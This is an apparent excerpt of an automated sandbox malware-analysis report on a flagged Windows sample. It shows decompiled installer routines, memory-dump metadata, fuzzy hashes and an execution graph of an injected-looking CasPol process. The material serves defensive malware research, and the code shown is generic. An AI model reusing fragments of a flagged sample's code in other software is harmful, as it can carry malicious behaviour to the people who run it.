                                                              • GlobalFree.KERNEL32 ref: 6F67124A
                                                              • GlobalFree.KERNEL32(?), ref: 6F67129B
                                                              • GlobalFree.KERNEL32(00000000), ref: 6F6712B1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62505218441.000000006F671000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F670000, based on PE: true
                                                              • Associated: 00000001.00000002.62505168749.000000006F670000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505286401.000000006F674000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505338915.000000006F676000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6f670000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: 02d8c7e6ac588db2575fbdec0f3dd6a9b3d15faf04927adf154a511c26a0edac
                                                              • Instruction ID: 518e68f1c143e0706dd35cba3c0610ed63fb1b13904fc74814f103fec0719bad
                                                              • Opcode Fuzzy Hash: 02d8c7e6ac588db2575fbdec0f3dd6a9b3d15faf04927adf154a511c26a0edac
                                                              • Instruction Fuzzy Hash: BB51ABB5900711DFDB24CF69CA68A6677E8FB0A324B00456BE954DB250EF30BD60CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                              				signed int _t14;
                                                              				int _t17;
                                                              				void* _t24;
                                                              				intOrPtr* _t29;
                                                              				void* _t31;
                                                              				signed int _t32;
                                                              				void* _t35;
                                                              				void* _t40;
                                                              				signed int _t42;
                                                              
                                                              				_t29 = __edi;
                                                              				_t24 = __ebx;
                                                              				_t14 =  *(_t35 - 0x28);
                                                              				_t40 = __edx - 0x38;
                                                              				 *(_t35 - 0x10) = _t14;
                                                              				_t27 = 0 | _t40 == 0x00000000;
                                                              				_t32 = _t40 == 0;
                                                              				if(_t14 == __ebx) {
                                                              					if(__edx != 0x38) {
                                                              						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                              					} else {
                                                              						E00402DA6(0x21);
                                                              						E0040668A("C:\Users\Arthur\AppData\Local\Temp\nsi821.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsi821.tmp\System.dll", 0x400);
                                                              						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsi821.tmp\System.dll");
                                                              					}
                                                              				} else {
                                                              					E00402D84(1);
                                                              					 *0x40adf8 = __ax;
                                                              					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                              				}
                                                              				 *(_t35 + 8) = _t17;
                                                              				if( *_t29 == _t24) {
                                                              					L13:
                                                              					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                              				} else {
                                                              					_t31 = E004065C8(_t27, _t29);
                                                              					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
                                                              						_t14 = E0040620A(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsi821.tmp\System.dll",  *(_t35 + 8));
                                                              						_t42 = _t14;
                                                              						if(_t42 == 0) {
                                                              							goto L13;
                                                              						}
                                                              					} else {
                                                              						goto L13;
                                                              					}
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                              				return 0;
                                                              			}












                                                              0x0040263e
                                                              0x0040263e
                                                              0x0040263e
                                                              0x00402643
                                                              0x00402646
                                                              0x00402649
                                                              0x0040264e
                                                              0x00402650
                                                              0x00402670
                                                              0x004026aa
                                                              0x00402672
                                                              0x00402674
                                                              0x00402688
                                                              0x00402695
                                                              0x00402695
                                                              0x00402652
                                                              0x00402654
                                                              0x00402659
                                                              0x00402667
                                                              0x0040266a
                                                              0x004026af
                                                              0x004026b2
                                                              0x0040292e
                                                              0x0040292e
                                                              0x004026b8
                                                              0x004026c1
                                                              0x004026c3
                                                              0x004026e2
                                                              0x004015b4
                                                              0x004015b6
                                                              0x00000000
                                                              0x004015bc
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004026c3
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll), ref: 00402695
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsi821.tmp$C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll
                                                              • API String ID: 1659193697-2652916719
                                                              • Opcode ID: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
                                                              • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                                              • Opcode Fuzzy Hash: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
                                                              • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00403C25() {
                                                              				void* _t1;
                                                              				void* _t2;
                                                              				signed int _t11;
                                                              
                                                              				_t1 =  *0x40a018; // 0x2e0
                                                              				if(_t1 != 0xffffffff) {
                                                              					CloseHandle(_t1);
                                                              					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                              				}
                                                              				_t2 =  *0x40a01c; // 0x2ec
                                                              				if(_t2 != 0xffffffff) {
                                                              					CloseHandle(_t2);
                                                              					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                              					_t11 =  *0x40a01c;
                                                              				}
                                                              				E00403C82();
                                                              				return E00405D74(_t11, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\nsi821.tmp", 7);
                                                              			}






                                                              0x00403c25
                                                              0x00403c34
                                                              0x00403c37
                                                              0x00403c39
                                                              0x00403c39
                                                              0x00403c40
                                                              0x00403c48
                                                              0x00403c4b
                                                              0x00403c4d
                                                              0x00403c4d
                                                              0x00403c4d
                                                              0x00403c54
                                                              0x00403c66

                                                              APIs
                                                              • CloseHandle.KERNEL32(000002E0,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                              • CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                              • C:\Users\user\AppData\Local\Temp\nsi821.tmp, xrefs: 00403C5B
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsi821.tmp
                                                              • API String ID: 2962429428-444898914
                                                              • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                              • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                              • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                              • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 90%
                                                              			E00406536(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                              				int _v8;
                                                              				long _t21;
                                                              				long _t24;
                                                              				char* _t30;
                                                              
                                                              				asm("sbb eax, eax");
                                                              				_v8 = 0x800;
                                                              				_t21 = E004064D5(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                              				_t30 = _a16;
                                                              				if(_t21 != 0) {
                                                              					L4:
                                                              					 *_t30 =  *_t30 & 0x00000000;
                                                              				} else {
                                                              					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                              					_t21 = RegCloseKey(_a20);
                                                              					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                              					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                              						goto L4;
                                                              					}
                                                              				}
                                                              				return _t21;
                                                              			}







                                                              0x00406544
                                                              0x00406546
                                                              0x0040655e
                                                              0x00406563
                                                              0x00406568
                                                              0x004065a6
                                                              0x004065a6
                                                              0x0040656a
                                                              0x0040657c
                                                              0x00406587
                                                              0x0040658d
                                                              0x00406598
                                                              0x00000000
                                                              0x00000000
                                                              0x00406598
                                                              0x004065ac

                                                              APIs
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                              • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll), ref: 00406587
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: Call
                                                              • API String ID: 3356406503-1824292864
                                                              • Opcode ID: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                              • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                              • Opcode Fuzzy Hash: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                              • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E00405F83(WCHAR* _a4) {
                                                              				WCHAR* _t5;
                                                              				WCHAR* _t7;
                                                              
                                                              				_t7 = _a4;
                                                              				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                              				while( *_t5 != 0x5c) {
                                                              					_push(_t5);
                                                              					_push(_t7);
                                                              					_t5 = CharPrevW();
                                                              					if(_t5 > _t7) {
                                                              						continue;
                                                              					}
                                                              					break;
                                                              				}
                                                              				 *_t5 =  *_t5 & 0x00000000;
                                                              				return  &(_t5[1]);
                                                              			}





                                                              0x00405f84
                                                              0x00405f8e
                                                              0x00405f91
                                                              0x00405f97
                                                              0x00405f98
                                                              0x00405f99
                                                              0x00405fa1
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405fa1
                                                              0x00405fa3
                                                              0x00405fab

                                                              APIs
                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe,C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe,80000000,00000003), ref: 00405F89
                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe,C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe,80000000,00000003), ref: 00405F99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-3370423016
                                                              • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                              • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                              • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                              • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                              				int _v8;
                                                              				int _t12;
                                                              				int _t14;
                                                              				int _t15;
                                                              				CHAR* _t17;
                                                              				CHAR* _t27;
                                                              
                                                              				_t12 = lstrlenA(_a8);
                                                              				_t27 = _a4;
                                                              				_v8 = _t12;
                                                              				while(lstrlenA(_t27) >= _v8) {
                                                              					_t14 = _v8;
                                                              					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                              					_t15 = lstrcmpiA(_t27, _a8);
                                                              					_t27[_v8] =  *(_t14 + _t27);
                                                              					if(_t15 == 0) {
                                                              						_t17 = _t27;
                                                              					} else {
                                                              						_t27 = CharNextA(_t27);
                                                              						continue;
                                                              					}
                                                              					L5:
                                                              					return _t17;
                                                              				}
                                                              				_t17 = 0;
                                                              				goto L5;
                                                              			}









                                                              0x004060cd
                                                              0x004060cf
                                                              0x004060d2
                                                              0x004060fe
                                                              0x004060d7
                                                              0x004060e0
                                                              0x004060e5
                                                              0x004060f0
                                                              0x004060f3
                                                              0x0040610f
                                                              0x004060f5
                                                              0x004060fc
                                                              0x00000000
                                                              0x004060fc
                                                              0x00406108
                                                              0x0040610c
                                                              0x0040610c
                                                              0x00406106
                                                              0x00000000

                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                              • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                              • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                              • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:15.5%
                                                              Dynamic/Decrypted Code Coverage:97%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:132
                                                              Total number of Limit Nodes:11
                                                              execution_graph 68494 1d32a100 68495 1d32a146 68494->68495 68498 1d32a2d2 68495->68498 68496 1d32a233 68499 1d32a343 DuplicateHandle 68498->68499 68501 1d32a2db 68498->68501 68500 1d32a3de 68499->68500 68500->68496 68501->68496 68502 1d3219a8 68503 1d3219d7 68502->68503 68506 1d321708 68503->68506 68505 1d321afc 68507 1d321713 68506->68507 68508 1d32201a 68507->68508 68511 1d324783 68507->68511 68523 1d324798 68507->68523 68508->68505 68512 1d3247c3 68511->68512 68535 1d323aa4 68512->68535 68515 1d324846 68518 1d324872 68515->68518 68546 1d323ab4 68515->68546 68520 1d323aa4 3 API calls 68520->68515 68524 1d3247c3 68523->68524 68525 1d323aa4 3 API calls 68524->68525 68526 1d32482a 68525->68526 68533 1d324cd0 3 API calls 68526->68533 68534 1d323aa4 3 API calls 68526->68534 68527 1d324846 68528 1d323ab4 GetModuleHandleW 68527->68528 68530 1d324872 68527->68530 68529 1d3248b6 68528->68529 68531 1d326681 2 API calls 68529->68531 68532 1d3266a8 CreateWindowExW 68529->68532 68531->68530 68532->68530 68533->68527 68534->68527 68536 1d323aaf 68535->68536 68537 1d32482a 68536->68537 68560 1d324ee0 68536->68560 68573 1d324ef0 68536->68573 68537->68520 68540 1d324cd0 68537->68540 68541 1d324ceb 68540->68541 68542 1d324cef 68540->68542 68541->68515 68543 1d324e2e 68542->68543 68544 1d324ef0 2 API calls 68542->68544 68545 1d324ee0 2 API calls 68542->68545 68544->68543 68545->68543 68547 1d325250 GetModuleHandleW 68546->68547 68549 1d3248b6 68547->68549 68550 1d3266a8 68549->68550 68553 1d326681 68549->68553 68586 1d324324 68550->68586 68554 1d3266ae 68553->68554 68557 1d3266e6 CreateWindowExW 68553->68557 68555 1d3266dd 68554->68555 68556 1d324324 CreateWindowExW 68554->68556 68555->68518 68556->68555 68559 1d32681c 68557->68559 68559->68559 68561 1d324f05 68560->68561 68562 1d323ab4 GetModuleHandleW 68561->68562 68563 1d324f4a 68561->68563 68562->68563 68564 1d323ab4 GetModuleHandleW 68563->68564 68566 1d325116 68563->68566 68567 1d32509b 68564->68567 68565 1d325171 68565->68537 68566->68565 68568 1d325298 GetModuleHandleW 68566->68568 68567->68565 68567->68566 68570 1d323ab4 GetModuleHandleW 68567->68570 68569 1d3252c5 68568->68569 68569->68537 68571 1d3250e9 68570->68571 68571->68566 68572 1d323ab4 GetModuleHandleW 68571->68572 68572->68566 68574 1d324f05 68573->68574 68575 1d323ab4 GetModuleHandleW 68574->68575 68576 1d324f4a 68574->68576 68575->68576 68577 1d323ab4 GetModuleHandleW 68576->68577 68580 1d325116 68576->68580 68579 1d32509b 68577->68579 68578 1d325171 68578->68537 68579->68578 68579->68580 68583 1d323ab4 GetModuleHandleW 68579->68583 68580->68578 68581 1d325298 GetModuleHandleW 68580->68581 68582 1d3252c5 68581->68582 68582->68537 68584 1d3250e9 68583->68584 68584->68580 68585 1d323ab4 GetModuleHandleW 68584->68585 68585->68580 68587 1d32432b CreateWindowExW 68586->68587 68589 1d32681c 68587->68589 68590 1d27d01c 68591 1d27d034 68590->68591 68592 1d27d08e 68591->68592 68598 1d32b362 68591->68598 68607 1d32433c 68591->68607 68611 1d32434c 68591->68611 68619 1d3268b0 68591->68619 68625 1d3268a0 68591->68625 68599 1d32b2ee 68598->68599 68601 1d32b36a 68598->68601 68600 1d32b3d1 68639 1d32af60 68600->68639 68601->68600 68603 1d32b3c1 68601->68603 68604 1d32b3cf 68603->68604 68631 1d32b4ea 68603->68631 68635 1d32b4f8 68603->68635 68608 1d324347 68607->68608 68643 1d324374 68608->68643 68610 1d3269e7 68610->68592 68613 1d324357 68611->68613 68612 1d32b3d1 68614 1d32af60 CallWindowProcW 68612->68614 68613->68612 68615 1d32b3c1 68613->68615 68616 1d32b3cf 68614->68616 68615->68616 68617 1d32b4ea CallWindowProcW 68615->68617 68618 1d32b4f8 CallWindowProcW 68615->68618 68617->68616 68618->68616 68620 1d3268d6 68619->68620 68621 1d32433c 3 API calls 68620->68621 68622 1d3268e2 68621->68622 68623 1d32434c CallWindowProcW 68622->68623 68624 1d3268f7 68623->68624 68624->68592 68626 1d3268b0 68625->68626 68627 1d32433c 3 API calls 68626->68627 68628 1d3268e2 68627->68628 68629 1d32434c CallWindowProcW 68628->68629 68630 1d3268f7 68629->68630 68630->68592 68632 1d32b506 68631->68632 68633 1d32af60 CallWindowProcW 68632->68633 68634 1d32b5f3 68632->68634 68633->68632 68634->68604 68636 1d32b506 68635->68636 68637 1d32af60 CallWindowProcW 68636->68637 68638 1d32b5f3 68636->68638 68637->68636 68638->68604 68640 1d32af6b 68639->68640 68641 1d32b6c2 CallWindowProcW 68640->68641 68642 1d32b671 68640->68642 68641->68642 68642->68604 68644 1d32437f 68643->68644 68645 1d323aa4 3 API calls 68644->68645 68646 1d326a49 68645->68646 68647 1d323ab4 GetModuleHandleW 68646->68647 68648 1d326ab7 68646->68648 68647->68648 68649 f1250d 68652 f0eeae 68649->68652 68650 f1244e TerminateThread 68650->68652 68651 f1255c 68652->68650 68652->68651
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (oi$(oi$(oi$(oi$(oi$(oi$(oi$,i$,i
                                                              • API String ID: 0-4155227096
                                                              • Opcode ID: 9690fc905658f75ddd060747d66b64bcd871c032b55378b12654006eacb925f1
                                                              • Instruction ID: f73e94e7f6313dd85134f70da689ff8d614261dd3963f44b6b64924ce3d4f148
                                                              • Opcode Fuzzy Hash: 9690fc905658f75ddd060747d66b64bcd871c032b55378b12654006eacb925f1
                                                              • Instruction Fuzzy Hash: 46722A30A08A499FCB14CFA4C584ADEBBF6BF48314F158599E8499F3A1D730ED45CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (oi$(oi$(oi$(oi$,i$,i$Hi
                                                              • API String ID: 0-655590077
                                                              • Opcode ID: 03af5208285b315060564d05dafb5bd3f008508c45ba7605f50c0c6648d62d77
                                                              • Instruction ID: b3796e100b5ea89b43490f6e6a59256b8088e396379e3969f85cc7aa1b46e116
                                                              • Opcode Fuzzy Hash: 03af5208285b315060564d05dafb5bd3f008508c45ba7605f50c0c6648d62d77
                                                              • Instruction Fuzzy Hash: E0726070A042199FCB14CF68C984AAEBBF6FF89314F198169E915AF351DB30EC45CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b83712fc22473c6eef618d227a8f40c3d90a6f43b61c6a388f63c70dc6c5e1dd
                                                              • Instruction ID: 448b38f129cbc78ebb8304beb7e20898d2b00deffbe64559aba8b6c43df9a579
                                                              • Opcode Fuzzy Hash: b83712fc22473c6eef618d227a8f40c3d90a6f43b61c6a388f63c70dc6c5e1dd
                                                              • Instruction Fuzzy Hash: 24B18070E04209CFDF00CFA9D8857DDBBF2AF89718F158529D815AB394EB74A859CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.67219443376.000000001F710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F710000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1f710000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (oi$(oi$(oi$(oi
                                                              • API String ID: 0-3267703457
                                                              • Opcode ID: 641c5cb1c712621c95d9473a328933ba8f8099e6e36c3787a7df2f7a8882cec4
                                                              • Instruction ID: 0c1324c98a064f55f29f543dd2997845a10b6764f812e7b48342dce03de593fb
                                                              • Opcode Fuzzy Hash: 641c5cb1c712621c95d9473a328933ba8f8099e6e36c3787a7df2f7a8882cec4
                                                              • Instruction Fuzzy Hash: B8C15730A046498FCB04CFA8C984AEEBBF6BF48314F158559E91AAF361D731E945CF90
